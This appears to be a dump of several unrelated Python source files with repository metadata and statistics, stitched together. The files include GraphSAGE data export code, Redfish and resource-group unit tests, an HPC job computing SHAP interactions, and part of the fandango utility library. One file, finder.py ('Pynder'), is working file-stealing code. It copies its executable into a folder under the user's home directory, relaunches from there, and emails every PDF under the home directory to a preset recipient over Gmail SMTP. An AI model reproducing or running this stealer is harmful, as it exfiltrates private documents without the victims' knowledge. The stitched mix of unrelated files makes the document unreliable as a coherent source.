train_nodes = []
for idx in range(dataset['num_datasets']):
tn = []
for u, v in dataset['Xy'][idx]['train']['X']:
if u not in tn:
tn.append(u)
if v not in tn:
tn.append(v)
train_nodes.append(tn)
nx.write_edgelist(test_graph, f'GraphSAGE/data/{name}.edgelist')
np.save(f'GraphSAGE/data/{name}-node-features', node_fts.numpy())
with open(f'GraphSAGE/data/{name}-train-nodes.pkl', 'wb') as fout:
pickle.dump(train_nodes, fout)
| 25.925
| 70
| 0.580521
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 227
| 0.218901
|
0b3963c63ed1877c12683ef9458a7f962df91e0e
| 3,243
|
py
|
Python
|
finder.py
|
giuseppebrb/Pynder
|
a47defc08ff497096a1fe507ab5d7b01997b69ef
|
[
"MIT"
] | 3
|
2017-11-11T01:19:57.000Z
|
2021-07-07T15:44:32.000Z
|
finder.py
|
giuseppebrb/Pynder
|
a47defc08ff497096a1fe507ab5d7b01997b69ef
|
[
"MIT"
] | null | null | null |
finder.py
|
giuseppebrb/Pynder
|
a47defc08ff497096a1fe507ab5d7b01997b69ef
|
[
"MIT"
] | null | null | null |
import os
import fnmatch
import smtplib
import email.mime.application
import sys
import subprocess
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from pathlib import Path
home = str(Path.home()) # Return a string representing the user’s home directory
fileFound = 0 # Number of files found while discovering
fileScanned = 0 # Number of the already processed files
maxSize = 23068672 # Attachments bytes limit for the mail host (22MB in byte, but it can be changed)
actualSizeCounter = 0 # Bytes count for files already attached to the email
paths = [] # List of files directories, matching the pattern, that will be print into the email body
# Following values need to be changed
email_user = "SENDER-ADDRESS-HERE"
email_pwd = "SENDER-PASSWORD-HERE"
recipient = "RECIPIENT-ADDRESS-HERE"
"""
This function returns a list of paths (strings) for every file under the given
path whose name matches the specified pattern
"""
def find(pattern, path):
result = []
for root, dirs, files in os.walk(path):
for name in files:
if fnmatch.fnmatch(name, pattern):
result.append(os.path.join(root, name))
return result
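# Editor's note (illustrative): find('*.txt', home) returns every .txt path
# under the user's home directory, e.g. ['C:\\Users\\me\\notes\\a.txt', ...].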
"""
__________ START - It may NOT work on MacOS __________
| |
"""
injecting_folder = home+'\\script' # 'Injecting' folder
if not os.path.exists(injecting_folder):
os.system("mkdir %s" % injecting_folder)
executableLocation = find('EXECUTABLE-NAME-HERE.exe', os.path.dirname(os.path.abspath(__file__)))
# Create a new 'injecting' folder where software will copy itself
if not os.path.isfile(injecting_folder + "\\EXECUTABLE-NAME-HERE.exe"):
os.system("xcopy {!s} {!s} /R".format(executableLocation[0], injecting_folder))
# If current working directory is not the 'injecting' folder opens a new instance from there and close this one.
if os.getcwd() != injecting_folder:
os.chdir(injecting_folder)
subprocess.Popen([injecting_folder+'\\EXECUTABLE-NAME-HERE.exe'], stdin=None, stdout=None, stderr=None)
sys.exit()
"""
|__________ END - It may NOT work on MacOS __________|
"""
filesFound = find("*.pdf", home) # List of every pdf file found in every folder starting from the user's home directory
# Building the email structure
msg = MIMEMultipart()
msg['From'] = email_user
msg['To'] = recipient
msg['Subject'] = "Files Found"
for f in filesFound:
fp = open(r'%s' % f, 'rb')
att = email.mime.application.MIMEApplication(fp.read())
fp.close()
paths.append("Directory: " + f)
att.add_header('Content-Disposition', 'attachment; filename="%s"' % f)
msg.attach(att)
for p in paths:
msg.attach(MIMEText(p, 'plain'))
# Open the connection with mail host with specified credentials
server = smtplib.SMTP('smtp.gmail.com', 587) # These values are just an example working with Gmail, you need to change
# them with your own host's SMTP address and port
server.ehlo()
server.starttls() # Starts a secure tls connection
server.login(email_user, email_pwd)
email_body = msg.as_string()
server.sendmail(email_user, recipient, email_body) # Send the email
server.quit() # Close the connection with host
sys.exit() # Quit program
| 35.25
| 120
| 0.716929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,633
| 0.503236
|
0b3b1b7fa53f607bfa6820806f9bdec88c43a29d
| 2,092
|
py
|
Python
|
sushy/tests/unit/resources/fabric/test_endpoint.py
|
sapcc/sushy
|
7016cc0f31050ab656e1e26c80bd44ce3e9fd57a
|
[
"Apache-2.0"
] | 37
|
2017-03-24T10:17:37.000Z
|
2022-02-10T19:42:26.000Z
|
sushy/tests/unit/resources/fabric/test_endpoint.py
|
sapcc/sushy
|
7016cc0f31050ab656e1e26c80bd44ce3e9fd57a
|
[
"Apache-2.0"
] | 4
|
2020-07-08T10:53:30.000Z
|
2020-07-30T11:56:20.000Z
|
sushy/tests/unit/resources/fabric/test_endpoint.py
|
sapcc/sushy
|
7016cc0f31050ab656e1e26c80bd44ce3e9fd57a
|
[
"Apache-2.0"
] | 29
|
2017-07-19T21:28:06.000Z
|
2021-06-09T05:20:32.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from unittest import mock
import sushy
from sushy.resources.fabric import endpoint
from sushy.tests.unit import base
class EndpointTestCase(base.TestCase):
def setUp(self):
super(EndpointTestCase, self).setUp()
self.conn = mock.Mock()
with open('sushy/tests/unit/json_samples/'
'endpoint.json') as f:
self.json_doc = json.load(f)
self.conn.get.return_value.json.return_value = self.json_doc
self.fab_endpoint = endpoint.Endpoint(
self.conn, '/redfish/v1/Fabrics/SAS/Endpoints/Drive1',
redfish_version='1.0.2')
def test__parse_attributes(self):
self.fab_endpoint._parse_attributes(self.json_doc)
self.assertEqual('Drive1', self.fab_endpoint.identity)
self.assertEqual('SAS Drive', self.fab_endpoint.name)
self.assertEqual(sushy.PROTOCOL_TYPE_SAS,
self.fab_endpoint.endpoint_protocol)
self.assertEqual(sushy.ENTITY_TYPE_DRIVE,
self.fab_endpoint.connected_entities[0].entity_type)
self.assertEqual(sushy.ENTITY_ROLE_TARGET,
self.fab_endpoint.connected_entities[0].entity_role)
con_entity = self.fab_endpoint.connected_entities[0]
self.assertEqual(sushy.DURABLE_NAME_FORMAT_NAA,
con_entity.identifiers[0].durable_name_format)
self.assertEqual('32ADF365C6C1B7C3',
con_entity.identifiers[0].durable_name)
| 40.230769
| 78
| 0.68021
| 1,385
| 0.662046
| 0
| 0
| 0
| 0
| 0
| 0
| 694
| 0.33174
|
0b3d35d3fa9e0c6688b8c47ccf07458bfaa3bde8
| 231
|
py
|
Python
|
engine/core/it_singleton.py
|
torrotitans/torro_community
|
a3f153e69a860f0d6c831145f529d9e92193a0ae
|
[
"MIT"
] | 1
|
2022-01-12T08:31:59.000Z
|
2022-01-12T08:31:59.000Z
|
engine/core/it_singleton.py
|
torrotitans/torro_community
|
a3f153e69a860f0d6c831145f529d9e92193a0ae
|
[
"MIT"
] | null | null | null |
engine/core/it_singleton.py
|
torrotitans/torro_community
|
a3f153e69a860f0d6c831145f529d9e92193a0ae
|
[
"MIT"
] | 2
|
2022-01-19T06:26:32.000Z
|
2022-01-26T15:25:15.000Z
|
#!/usr/bin/python
# -*- coding: UTF-8 -*
from db.it.db_it_mgr import it_mgr
__all__ = {"itSingleton"}
class itSingleton():
def get_cmd_sql(self, sql):
return it_mgr.get_cmd_sql(sql)
it_singleton = itSingleton()
| 13.588235
| 38
| 0.670996
| 93
| 0.402597
| 0
| 0
| 0
| 0
| 0
| 0
| 52
| 0.225108
|
0b3f444aab07f3ace7008a9a2f44f279835a4a8e
| 25,437
|
py
|
Python
|
analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py
|
akuhnregnier/wildfire-analysis
|
a04deada145cec864051d2fb15aec1a53a0246b9
|
[
"MIT"
] | null | null | null |
analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py
|
akuhnregnier/wildfire-analysis
|
a04deada145cec864051d2fb15aec1a53a0246b9
|
[
"MIT"
] | null | null | null |
analyses/seasonality_paper_st/lai_only/shap_interaction/model_analysis_shap_interaction_1.py
|
akuhnregnier/wildfire-analysis
|
a04deada145cec864051d2fb15aec1a53a0246b9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from pathlib import Path
from wildfires.utils import handle_array_job_args
try:
# This will only work after the path modification carried out in the job script.
from specific import (
CACHE_DIR,
SimpleCache,
get_model,
data_split_cache,
get_shap_values,
)
except ImportError:
"""Not running as an HPC job yet."""
def func():
# Used to re-compute specific failed jobs, `None` otherwise.
indices = [
0,
1,
2,
3,
4,
7,
8,
9,
15,
61,
62,
63,
64,
65,
66,
68,
69,
73,
75,
76,
77,
78,
79,
80,
81,
82,
83,
92,
93,
102,
103,
119,
120,
121,
122,
123,
128,
129,
130,
132,
169,
170,
171,
172,
174,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
185,
188,
189,
200,
201,
208,
209,
229,
230,
231,
232,
233,
235,
236,
237,
242,
260,
261,
275,
276,
277,
278,
280,
281,
283,
284,
285,
286,
287,
288,
289,
290,
291,
292,
302,
303,
333,
334,
335,
336,
337,
345,
346,
347,
349,
366,
367,
382,
383,
384,
385,
390,
391,
397,
401,
402,
403,
404,
405,
406,
407,
408,
409,
419,
420,
446,
447,
448,
449,
450,
456,
457,
458,
465,
479,
480,
488,
489,
490,
491,
492,
493,
499,
500,
501,
502,
503,
505,
506,
507,
508,
509,
520,
521,
532,
533,
548,
549,
550,
551,
552,
553,
554,
555,
556,
561,
562,
563,
564,
579,
580,
595,
596,
601,
602,
603,
604,
606,
608,
620,
621,
646,
647,
648,
649,
651,
652,
653,
654,
655,
664,
665,
666,
667,
680,
681,
698,
699,
704,
705,
706,
707,
708,
709,
717,
718,
735,
736,
737,
738,
739,
740,
741,
742,
743,
751,
752,
753,
754,
768,
769,
801,
802,
808,
809,
810,
811,
814,
815,
823,
824,
856,
857,
858,
859,
860,
861,
862,
863,
864,
868,
869,
870,
871,
892,
893,
936,
937,
946,
947,
948,
949,
950,
951,
966,
967,
977,
978,
1001,
1002,
1003,
1004,
1005,
1006,
1008,
1009,
1010,
1013,
1014,
1015,
1016,
1049,
1050,
1054,
1055,
1056,
1057,
1058,
1059,
1064,
1065,
1073,
1074,
1086,
1087,
1088,
1089,
1090,
1091,
1094,
1095,
1096,
1100,
1101,
1102,
1104,
1126,
1128,
1129,
1130,
1131,
1132,
1133,
1139,
1140,
1147,
1148,
1163,
1164,
1165,
1166,
1167,
1168,
1170,
1171,
1172,
1173,
1174,
1201,
1202,
1203,
1204,
1205,
1206,
1207,
1217,
1218,
1230,
1231,
1241,
1242,
1243,
1244,
1245,
1246,
1247,
1248,
1249,
1250,
1251,
1252,
1267,
1268,
1275,
1276,
1277,
1281,
1282,
1283,
1284,
1286,
1287,
1294,
1295,
1306,
1307,
1308,
1309,
1310,
1311,
1312,
1313,
1314,
1324,
1325,
1332,
1333,
1334,
1335,
1336,
1337,
1338,
1339,
1340,
1345,
1346,
1360,
1361,
1362,
1363,
1366,
1367,
1368,
1369,
1370,
1380,
1381,
1393,
1394,
1395,
1398,
1403,
1404,
1405,
1406,
1407,
1408,
1411,
1412,
1426,
1427,
1428,
1429,
1430,
1438,
1439,
1449,
1450,
1451,
1452,
1454,
1455,
1456,
1457,
1458,
1459,
1462,
1463,
1471,
1472,
1473,
1474,
1475,
1485,
1486,
1494,
1496,
1497,
1498,
1503,
1504,
1505,
1506,
1507,
1508,
1514,
1515,
1521,
1522,
1529,
1530,
1531,
1536,
1537,
1538,
1540,
1541,
1562,
1564,
1565,
1566,
1572,
1574,
1575,
1576,
1577,
1578,
1579,
1584,
1585,
1591,
1592,
1604,
1605,
1606,
1616,
1617,
1618,
1619,
1620,
1643,
1644,
1645,
1646,
1658,
1659,
1660,
1661,
1662,
1663,
1664,
1672,
1673,
1677,
1678,
1689,
1690,
1691,
1706,
1707,
1708,
1709,
1710,
1737,
1740,
1741,
1742,
1750,
1751,
1752,
1753,
1754,
1755,
1756,
1764,
1765,
1769,
1770,
1776,
1781,
1782,
1791,
1792,
1793,
1794,
1795,
1826,
1827,
1828,
1829,
1836,
1837,
1838,
1839,
1840,
1843,
1844,
1851,
1852,
1855,
1856,
1862,
1863,
1864,
1876,
1877,
1878,
1879,
1880,
1901,
1903,
1904,
1905,
1914,
1915,
1916,
1917,
1918,
1919,
1920,
1927,
1928,
1939,
1940,
1957,
1958,
1959,
1962,
1964,
1965,
1966,
1971,
1972,
1973,
1974,
1975,
1976,
1977,
1981,
1982,
2004,
2005,
2027,
2028,
2051,
2053,
2054,
2056,
2059,
2060,
2061,
2073,
2074,
2075,
2076,
2077,
2078,
2079,
2095,
2096,
2102,
2103,
2131,
2132,
2133,
2134,
2185,
2187,
2188,
2189,
2192,
2193,
2194,
2201,
2202,
2203,
2204,
2205,
2206,
2207,
2222,
2225,
2226,
2235,
2236,
2255,
2256,
2257,
2258,
2313,
2316,
2317,
2320,
2323,
2324,
2326,
2336,
2337,
2338,
2339,
2340,
2341,
2342,
2345,
2350,
2351,
2364,
2365,
2387,
2388,
2389,
2390,
2433,
2435,
2436,
2437,
2439,
2440,
2443,
2449,
2450,
2451,
2452,
2453,
2454,
2455,
2461,
2465,
2466,
2470,
2471,
2487,
2488,
2489,
2490,
2533,
2536,
2537,
2538,
2540,
2541,
2542,
2546,
2547,
2548,
2549,
2550,
2551,
2552,
2563,
2566,
2567,
2572,
2573,
2588,
2589,
2590,
2591,
2640,
2641,
2642,
2643,
2644,
2646,
2647,
2648,
2657,
2658,
2659,
2660,
2661,
2662,
2663,
2671,
2674,
2675,
2681,
2682,
2704,
2705,
2706,
2707,
2750,
2752,
2753,
2754,
2755,
2756,
2757,
2758,
2762,
2763,
2764,
2765,
2766,
2767,
2768,
2773,
2778,
2779,
2791,
2792,
2817,
2818,
2819,
2820,
2842,
2845,
2846,
2847,
2848,
2849,
2850,
2851,
2854,
2855,
2856,
2858,
2859,
2860,
2863,
2869,
2870,
2882,
2883,
2895,
2896,
2897,
2898,
2899,
2903,
2920,
2924,
2925,
2926,
2927,
2928,
2929,
2930,
2933,
2934,
2935,
2936,
2937,
2940,
2944,
2945,
2948,
2949,
2959,
2960,
2973,
2974,
2975,
2976,
2977,
2980,
3013,
3016,
3017,
3018,
3019,
3020,
3021,
3022,
3024,
3027,
3028,
3029,
3032,
3034,
3038,
3046,
3047,
3052,
3053,
3057,
3058,
3074,
3075,
3076,
3077,
3078,
3089,
3123,
3125,
3126,
3127,
3128,
3129,
3130,
3131,
3132,
3138,
3139,
3140,
3141,
3142,
3144,
3145,
3146,
3150,
3151,
3159,
3160,
3179,
3180,
3181,
3182,
3183,
3190,
3230,
3232,
3233,
3234,
3235,
3236,
3237,
3238,
3239,
3240,
3245,
3246,
3247,
3248,
3249,
3250,
3254,
3255,
3258,
3259,
3266,
3267,
3300,
3301,
3302,
3303,
3304,
3305,
3309,
3331,
3332,
3333,
3334,
3335,
3337,
3338,
3340,
3341,
3343,
3345,
3346,
3347,
3348,
3349,
3350,
3357,
3358,
3361,
3362,
3370,
3371,
3400,
3401,
3402,
3403,
3404,
3405,
3415,
3456,
3458,
3459,
3460,
3461,
3463,
3464,
3466,
3467,
3468,
3472,
3473,
3474,
3475,
3476,
3477,
3479,
3480,
3482,
3483,
3488,
3489,
3506,
3508,
3509,
3510,
3511,
3512,
3513,
3524,
3556,
3557,
3558,
3559,
3560,
3563,
3564,
3565,
3566,
3567,
3571,
3572,
3573,
3575,
3576,
3578,
3588,
3589,
3592,
3593,
3599,
3600,
3622,
3624,
3625,
3626,
3627,
3628,
3629,
3646,
3676,
3677,
3678,
3679,
3680,
3681,
3682,
3683,
3685,
3686,
3687,
3692,
3693,
3694,
3695,
3696,
3698,
3701,
3708,
3709,
3714,
3715,
3718,
3719,
3740,
3741,
3743,
3745,
3746,
3747,
3748,
3749,
3759,
3791,
3792,
3793,
3794,
3795,
3796,
3798,
3799,
3800,
3801,
3802,
3811,
3812,
3813,
3814,
3815,
3816,
3818,
3826,
3827,
3829,
3830,
3839,
3840,
3856,
3857,
3858,
3859,
3860,
3861,
3872,
3904,
3905,
3907,
3908,
3909,
3910,
3911,
3912,
3913,
3914,
3915,
3916,
3922,
3923,
3924,
3925,
3926,
3927,
3929,
3933,
3934,
3935,
3940,
3941,
3946,
3947,
3969,
3970,
3971,
3972,
3973,
3974,
3975,
3985,
4017,
4020,
4021,
4022,
4023,
4024,
4025,
4026,
4027,
4028,
4029,
4034,
4035,
4036,
4037,
4038,
4039,
4042,
4050,
4051,
4052,
4053,
4054,
4058,
4059,
4069,
4071,
4072,
4073,
4074,
4075,
4076,
4082,
4100,
4102,
4103,
4104,
4105,
4106,
4108,
4109,
4112,
4113,
4114,
4115,
4116,
4117,
4118,
4119,
4120,
4121,
4122,
4127,
4128,
4129,
4130,
4131,
4144,
4145,
4158,
4160,
4161,
4162,
4163,
4164,
4165,
4166,
4172,
4175,
4177,
4178,
4201,
4202,
4203,
4204,
4205,
4206,
4207,
4208,
4210,
4211,
4212,
4213,
4214,
4223,
4224,
4225,
4226,
4227,
4228,
4229,
4234,
4235,
4236,
4237,
4238,
4248,
4261,
4263,
4264,
4265,
4266,
4267,
4268,
4269,
4270,
4285,
4288,
4292,
4298,
4299,
4318,
4322,
4323,
4324,
4325,
4326,
4329,
4330,
4333,
4334,
4336,
4338,
4339,
4340,
4341,
4342,
4345,
4350,
4351,
4352,
4353,
4354,
4366,
4367,
4380,
4382,
4387,
4388,
4389,
4390,
4391,
4392,
4393,
4399,
4403,
4411,
4415,
4416,
4426,
4427,
4444,
4445,
4446,
4447,
4448,
4449,
4450,
4451,
4452,
4453,
4457,
4458,
4459,
4460,
4462,
4464,
4466,
4467,
4475,
4476,
4477,
4478,
4479,
4498,
4499,
4507,
4509,
4510,
4511,
4512,
4513,
4514,
4515,
4524,
4525,
4526,
4533,
4539,
4540,
4549,
4550,
4563,
4566,
4568,
4569,
4570,
4571,
4573,
4574,
4575,
4576,
4578,
4582,
4583,
4584,
4585,
4586,
4587,
4588,
4596,
4597,
4598,
4599,
4600,
4601,
4609,
4610,
4624,
4626,
4627,
4628,
4629,
4630,
4631,
4632,
4638,
4646,
4652,
4653,
4659,
4660,
4669,
4672,
4673,
4674,
4675,
4677,
4678,
4681,
4682,
4683,
4687,
4688,
4689,
4690,
4691,
4692,
4693,
4702,
4703,
4704,
4705,
4706,
4707,
4708,
4723,
4724,
4737,
4739,
4740,
4741,
4742,
4743,
4744,
4745,
4746,
4759,
4768,
4772,
4773,
4779,
4795,
4801,
4802,
4803,
4804,
4806,
4807,
4809,
4810,
4812,
4820,
4821,
4822,
4823,
4825,
4826,
4828,
4829,
4838,
4839,
4840,
4841,
4842,
4843,
4844,
4845,
4858,
4859,
4890,
4891,
4892,
4894,
4895,
4896,
4897,
4898,
4899,
4900,
4911,
4912,
4913,
4915,
4921,
4924,
4925,
4935,
4936,
4957,
4959,
4960,
4961,
4962,
4964,
4965,
4966,
4967,
4969,
4970,
4973,
4977,
4978,
4979,
4980,
4981,
4982,
4990,
4991,
4992,
4993,
4994,
4996,
4997,
4998,
5025,
5028,
5031,
5032,
5033,
5034,
5035,
5036,
5037,
5045,
5046,
5047,
5049,
5054,
5055,
5059,
5060,
5071,
5072,
5105,
5107,
5108,
5109,
5110,
5116,
5118,
5119,
5120,
5122,
5123,
5124,
5126,
5127,
5128,
5137,
5138,
5139,
5140,
5141,
5142,
5143,
5144,
5174,
5176,
5178,
5179,
5180,
5181,
5182,
5183,
5184,
5188,
5189,
5195,
5200,
5201,
5202,
5205,
5206,
5207,
5208,
5213,
5214,
5232,
5233,
5234,
5235,
5236,
5237,
5238,
5239,
5240,
5241,
5242,
5245,
5248,
5249,
5250,
5253,
5254,
5256,
5260,
5261,
5262,
5263,
5264,
5266,
5267,
5268,
5289,
5290,
5292,
5293,
5294,
5295,
5296,
5297,
5298,
5299,
5300,
5306,
5308,
5309,
5310,
5319,
5320,
5327,
5328,
5339,
5340,
5352,
5353,
5354,
5355,
5356,
5357,
5358,
5359,
5361,
5366,
5367,
5368,
5369,
5370,
5371,
5376,
5380,
5381,
5382,
5383,
5384,
5385,
5386,
5387,
5418,
5419,
5421,
5422,
5423,
5424,
5425,
5426,
5427,
5430,
5431,
5438,
5439,
5440,
5441,
5448,
5449,
5454,
5455,
5460,
5461,
5482,
5483,
5484,
5485,
5486,
5488,
5489,
5490,
5491,
5499,
5500,
5501,
5502,
5503,
5504,
5511,
5515,
5516,
5517,
5518,
5519,
5520,
5521,
5522,
5538,
5556,
5557,
5559,
5560,
5561,
5562,
5563,
5564,
5565,
5570,
5571,
5577,
5579,
5580,
5582,
5587,
5588,
5592,
5593,
5601,
5627,
5628,
5629,
5630,
5631,
5633,
5634,
5635,
5636,
5639,
5640,
5641,
5643,
5644,
5645,
5652,
5653,
5654,
5655,
5656,
5657,
5658,
5659,
5660,
5672,
5696,
5697,
5698,
5700,
5701,
5702,
5703,
5704,
5705,
5706,
5710,
5711,
5715,
5716,
5717,
5719,
5723,
5724,
5727,
5728,
5738,
5764,
5765,
5766,
5767,
5769,
5770,
5771,
5772,
5782,
5783,
5784,
5786,
5787,
5788,
5794,
5798,
5799,
5800,
5801,
5802,
5803,
5804,
5805,
5815,
5816,
5837,
5838,
5839,
5840,
5842,
5843,
5844,
5845,
5846,
5847,
5848,
5850,
5851,
5855,
5857,
5858,
5860,
5871,
5872,
5874,
5875,
5899,
5900,
5901,
5902,
5905,
5906,
5907,
5908,
5913,
5914,
5915,
5916,
5917,
5918,
5920,
5926,
5927,
5928,
5929,
5930,
5931,
5932,
5933,
5940,
5941,
5963,
5964,
5965,
5966,
5967,
5968,
5969,
5970,
5972,
5973,
5974,
5975,
5976,
5978,
5979,
5982,
5983,
5990,
5994,
5995,
5997,
]
index = int(os.environ["PBS_ARRAY_INDEX"])
if indices is not None:
index = indices[index]
print("Index:", index)
X_train, X_test, y_train, y_test = data_split_cache.load()
rf = get_model()
job_samples = 50
tree_path_dependent_shap_interact_cache = SimpleCache(
f"tree_path_dependent_shap_interact_{index}_{job_samples}",
cache_dir=os.path.join(CACHE_DIR, "shap_interaction"),
)
@tree_path_dependent_shap_interact_cache
def cached_get_interact_shap_values(model, X):
return get_shap_values(model, X, interaction=True)
cached_get_interact_shap_values(
rf, X_train[index * job_samples : (index + 1) * job_samples]
)
if __name__ == "__main__":
handle_array_job_args(
Path(__file__).resolve(),
func,
ncpus=1,
mem="7gb",
walltime="11:00:00",
max_index=1734,
)
| 14.16314
| 84
| 0.298306
| 0
| 0
| 0
| 0
| 150
| 0.005897
| 0
| 0
| 347
| 0.013642
|
0b3f95c97639b3abd555db4e30fef992d56dda30
| 1,954
|
py
|
Python
|
tests/test_res_grp_config.py
|
danos/vplane-config-npf
|
2103ac7e19ee77eacff30a3d11cf487dfbefee26
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_res_grp_config.py
|
danos/vplane-config-npf
|
2103ac7e19ee77eacff30a3d11cf487dfbefee26
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_res_grp_config.py
|
danos/vplane-config-npf
|
2103ac7e19ee77eacff30a3d11cf487dfbefee26
|
[
"BSD-3-Clause"
] | 2
|
2020-05-27T10:34:20.000Z
|
2021-01-20T05:40:32.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2019, AT&T Intellectual Property.
# All rights reserved.
#
# SPDX-License-Identifier: LGPL-2.1-only
#
"""
Unit-tests for the res_grp_config.py module.
"""
from vyatta.res_grp.res_grp_config import ResGrpConfig
TEST_DATA = {
'vyatta-resources-v1:resources': {
'vyatta-resources-group-misc-v1:group': {
'vyatta-resources-dscp-group-v1:dscp-group': [
{
'group-name': 'group-a',
'dscp': [
'0', '1', '2', '3', '4', '5', '6', '7', '8',
'9', '10', '11', '12', '13', '14', '15'
]
}, {
'group-name': 'group-b',
'dscp': [
'16', '17', '18', '19', '20', '21', '22', '23',
'24', '25', '26', '27', '28', '29', '30', '31'
]
}, {
'group-name': 'group-c',
'dscp': [
'32', '33', '34', '35', '36', '37', '38', '39',
'40', '41', '42', '43', '44', '45', '46', '47'
]
}, {
'group-name': 'group-d',
'dscp': [
'48', '49', '50', '51', '52', '53', '54', '55',
'56', '57', '58', '59', '60', '61', '62', '63'
]
}
]
}
}
}
def test_rgconfig():
""" Simple unit-test for the ResGrpConfig class """
config = ResGrpConfig(TEST_DATA)
assert config is not None
assert len(config.dscp_groups) == 4
assert config.get_dscp_group("group-a") is not None
assert config.get_dscp_group("group-b") is not None
assert config.get_dscp_group("group-c") is not None
assert config.get_dscp_group("group-d") is not None
assert config.get_dscp_group("group-e") is None
| 32.566667
| 71
| 0.413511
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 745
| 0.381269
|
0b4263d7f857ffd13d9244963a213a2d55a3ea6f
| 36,145
|
py
|
Python
|
fandango/objects.py
|
rhomspuron/fandango
|
51cc7659dfa7ea8c5890a993bbcc4c2049e45136
|
[
"CC-BY-3.0"
] | null | null | null |
fandango/objects.py
|
rhomspuron/fandango
|
51cc7659dfa7ea8c5890a993bbcc4c2049e45136
|
[
"CC-BY-3.0"
] | null | null | null |
fandango/objects.py
|
rhomspuron/fandango
|
51cc7659dfa7ea8c5890a993bbcc4c2049e45136
|
[
"CC-BY-3.0"
] | null | null | null |
#!/usr/bin/env python2.5
#############################################################################
##
## file : objects.py
##
## description : see below
##
## project : Tango Control System
##
## $Author: srubio@cells.es, tcoutinho@cells.es, homs@esrf.fr $
##
##
## $Revision: 2008 $
##
## copyleft : ALBA Synchrotron Controls Section, CELLS
## Bellaterra
## Spain
##
#############################################################################
##
## This file is part of Tango Control System
##
## Tango Control System is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as published
## by the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## Tango Control System is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, see <http://www.gnu.org/licenses/>.
###########################################################################
"""
fandango.objects contains method for loading python modules and objects
"on the run", as well as several advanced types used within fandango library
Struct, Decorator and Cached are fundamental types for all fandango API's
It includes 2 wonderful classes: Object (by Alejandro Homs)
and Singleton (by Marc Santiago)
Enum classes are borrowed from taurus.core.utils (by Tiago Coutinho)
"""
import __builtin__
from __builtin__ import object
import traceback
from fandango.functional import *
from operator import isCallable, isSequenceType
from collections import Hashable
from types import MethodType
import threading
import functools
#Python 2-3 conundrum
try:
import queue
import queue as Queue
except:
import Queue
import Queue as queue
try:
from collections import namedtuple #Only available since python 2.6
except:
namedtuple = None
## Inspection methods
def dirModule(module):
return [a for a,v in module.__dict__.items()
if getattr(v,'__module__','') == module.__name__]
def findModule(module):
from imp import find_module
if '.' not in module:
return find_module(module)[1]
else:
parent,child = module.rsplit('.', 1)
#mparent = loadModule(parent)
pparent = findModule(parent)
pchild = find_module(child, [pparent])[1]
return pchild
def loadModule(module,modulename=None):
#Loads a python module either from source file or from module
import imp
if modulename or '/' in module or '.py' in module:
if not modulename:
modulename = module.split('/')[-1].split('.py')[0]
modulename = replaceCl('[-\.]', '_', modulename)
return imp.load_source(modulename, module)
elif '.' not in module:
return imp.load_module(module, *imp.find_module(module))
else:
parent,child = module.rsplit('.', 1)
mparent = loadModule(parent)
args = imp.find_module(child, mparent.__path__)
mchild = imp.load_module(module, *args)
return mchild
def dirClasses(module,owned=False):
v = [a for a,v in module.__dict__.items() if isinstance(v,type)]
if owned: return [a for a in dirModule(module) if a in v]
else: return v
def copy(obj):
"""
This method will return a copy for a python primitive object.
It will not work for class objects unless they implement the
__init__(other) constructor
"""
if hasattr(obj,'copy'):
o = obj.copy()
else:
try:
o = type(obj)(other=obj)
except:
o = type(obj)(obj)
return o
##############################################################################
# Methods for pickling/dumping, passing objects to files/queues
def obj2dict(obj,type_check=True,class_check=False,fltr=None):
"""
Converts a python object to a dictionary with all its members
as python primitives
This can be used in Queues or to convert to str using pickle.dumps
:param fltr: a callable(name):bool method
"""
dct = {}
try:
for name in dir(obj):
if fltr and not fltr(name):
continue
try:
attr = getattr(obj,name)
if hasattr(attr,'__call__'): continue
if name == 'inited_class_list': continue
if name.startswith('__'): continue
if type_check:
try:
if type(attr).__name__ not in dir(__builtin__):
if isinstance(attr,dict):
attr = dict((k,v) for k,v in attr.items())
else:
attr = str(attr)
except:
continue
dct[name] = attr
except Exception,e:
print(e)
if class_check:
klass = obj.__class__
if '__class__' not in dct:
dct['__class__'] = klass.__name__
if '__bases__' not in dct:
dct['__bases__'] = [b.__name__ for b in klass.__bases__]
if '__base__' not in dct:
dct['__base__'] = klass.__base__.__name__
except Exception,e:
print(e)
return dct
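# Editor's note: minimal usage sketch, not part of the original module. Builtin-
# typed attributes are kept, anything else is stringified, so the result is safe
# to pickle or to put on a Queue:
#
#   class Point(object):
#       def __init__(self): self.x, self.y = 1, 2
#   obj2dict(Point())   # -> {'x': 1, 'y': 2}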
def pick(filename, keys = []):
import pickle
try:
f = open(filename)
v = pickle.load(f)
if keys:
try:
for k in keys:
v = v[k]
except:
traceback.print_exc()
return v
except:
traceback.print_exc()
finally:
f.close()
def dump(value, filename, as_dict = False):
import pickle
try:
f = open(filename, 'w')
if not as_dict:
try:
pickle.dump(value, f)
except:
as_dict = True
if as_dict:
pickle.dump(obj2dict(value), f)
except:
traceback.print_exc()
finally:
f.close()
## Useful class objects
class Struct(object):
"""
Metamorphic type to pass/retrieve data objects as object or dictionary
s = Struct(name='obj1',value=3.0)
s.setCastMethod(lambda k,v: str2type)
